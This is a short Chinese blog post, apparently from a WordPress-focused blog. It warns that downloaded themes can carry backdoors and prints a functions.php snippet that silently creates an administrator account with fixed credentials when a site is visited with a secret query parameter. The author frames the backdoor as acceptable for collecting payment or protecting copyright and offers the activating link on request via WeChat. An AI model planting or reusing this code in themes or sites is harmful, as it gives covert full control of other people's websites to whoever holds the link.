最近很多朋友问我百度搜索的模板能不能用?能用,但是有风险!因为为模板添加一个后门很简单,这里所谓的后门就是通过在模板函数文件中添加一段代码,然后通过一段隐秘的链接尽快就可以设置管理员账号进入网站后台。
以下既是一段简单的后门代码:
- add_action(‘wp_head’, ‘holeinthewall’);
- function holeinthewall() {
- If ($_GET[‘backdoor’] == ‘go’) {
- require(‘wp-includes/registration.php’);
- If (!username_exists(‘username’)) {
- $user_id = wp_create_user(‘username’, ‘password’);
- $user = new WP_User($user_id);
- $user->set_role(‘administrator’);
- }
- }
- }
模板制作者只要把这段代码放置到模板函数文件functions.php文件中,然后通过一个隐秘的链接就可以创建一个用户名为“username”,密码为:“password” 的管理员账号,从而进入网站后台为所欲为。
说明:因为这种方式仅可以使用到接单追款和版权保护,所以不再分享隐秘链接,如有特殊需要请联系我的个人微信号(xiaochuanblog)索要。